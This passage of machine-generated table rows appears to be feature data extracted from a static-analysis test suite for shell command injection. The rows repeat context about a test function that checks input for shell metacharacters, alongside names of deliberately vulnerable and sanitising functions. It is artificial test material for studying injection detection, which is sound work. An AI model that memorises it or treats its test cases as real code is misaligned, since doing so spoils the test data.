name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:393:16 | s[i] == ... == '\\\\' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:393:16 | s[i] == ... == '\\\\' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:393:16 | s[i] == ... == '\\\\' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:393:16 | s[i] == ... == '\\\\' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:394:16 | s[i] == ... == '\\t' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:394:16 | s[i] == ... == '\\t' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:394:16 | s[i] == ... == '\\t' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:394:16 | s[i] == ... == '\\t' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:394:16 | s[i] == ... == '\\t' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:395:16 | s[i] == ... == '\\n' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:395:16 | s[i] == ... == '\\n' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:395:16 | s[i] == ... == '\\n' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:395:16 | s[i] == ... == '\\n' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:395:16 | s[i] == ... == '\\n' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:396:16 | s[i] == ... == '\\'' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:396:16 | s[i] == ... == '\\'' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:396:16 | s[i] == ... == '\\'' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:396:16 | s[i] == ... == '\\'' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:396:16 | s[i] == ... == '\\'' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:397:15 | s[i] == ... === '`' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:397:15 | s[i] == ... === '`' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:397:15 | s[i] == ... === '`' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:397:15 | s[i] == ... === '`' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:397:15 | s[i] == ... === '`' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:398:15 | s[i] == ... === '"' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:398:15 | s[i] == ... === '"' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:398:15 | s[i] == ... === '"' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:398:15 | s[i] == ... === '"' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:9:398:15 | s[i] == ... === '"' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:11:377:11 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:11:377:11 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:11:377:11 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:11:377:11 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:11:377:11 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:18:377:26 | undefined | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:18:377:26 | undefined | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:18:377:26 | undefined | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:18:377:26 | undefined | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:377:18:377:26 | undefined | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:4:378:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:4:378:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:4:378:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:4:378:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:4:378:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:4:378:7 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:4:378:7 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:4:378:7 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:4:378:7 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:4:378:7 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:4:378:15 | s[i] === '>' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:4:378:15 | s[i] === '>' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:4:378:15 | s[i] === '>' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:4:378:15 | s[i] === '>' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:4:378:15 | s[i] === '>' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:6:378:6 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:6:378:6 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:6:378:6 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:6:378:6 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:6:378:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:13:378:15 | '>' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:13:378:15 | '>' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:13:378:15 | '>' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:13:378:15 | '>' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:378:13:378:15 | '>' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:4:379:4 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:4:379:4 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:4:379:4 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:4:379:4 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:379:4:379:4 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| 